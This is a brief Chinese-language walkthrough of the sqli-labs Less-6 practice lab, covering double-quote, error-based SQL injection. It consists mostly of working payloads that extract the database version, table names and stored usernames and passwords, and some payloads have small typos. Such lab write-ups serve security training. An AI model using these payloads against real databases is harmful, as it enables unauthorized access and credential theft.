sqli-labs Less-6

Less-6 GET - Double Injection -Double quotes - String
1.原页面
2.?id=1

3.?id=1

‘’’1\’’ LIMIT 0,1’ --> ‘ ‘’1\’’LIMIT 0,1 ‘ --> ‘’1\’’LIMIT 0,1 -->
SQL：
Select login_name,password from admin where id=’’input’’ limit 0,1;

4.获取数据库
?id=0” union select 1,count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)2)) as a from information_schema.tables group by a–+
（具体原理请看：https://blog.****.net/qq_42630215/article/details/104700359）

5.获取表名
?id=0” union select 1,count(),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))as a from information_schema.tables group by a --+

查看其它表，改limit值就可以

6.获取用户信息
?id=0” union select 1,count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))as a from information_schema.tables group by a --+

获取其他用户信息，改limit值就可以